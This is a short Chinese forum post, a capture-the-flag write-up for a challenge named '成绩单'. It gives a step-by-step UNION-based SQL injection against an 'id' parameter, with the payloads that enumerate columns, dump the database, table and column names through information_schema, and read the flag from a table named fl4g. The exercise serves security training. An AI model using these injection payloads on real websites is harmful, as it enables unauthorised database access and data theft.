[Writeup] 成绩单 之前题目起错了

[复制链接]
查看13297 | 回复1 | 2017-6-1 11:28:13 | 显示全部楼层 |阅读模式
很简单的注入    id 遍历表单发现 有4个表
然后  id=-1' union select 1,2,3,4 #、
发现都有回显,很简单的一个联合注入   
一步一步就出来结果了  
id=-1' union select 1,2,3, database()# 暴库
id=-1' union select 1,2,3, group_concat(table_name) from information_schema.tables where table_schema=database()#爆表
id=-1' union select 1,2,3, group_concat(column_name) from information_schema.columns where table_name=0x666c3467#爆字段
id=-1' union select 1,2,3,skctf_flag from fl4g#爆内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

9

主题

21

帖子

74

积分

版主

Rank: 7Rank: 7Rank: 7

积分
74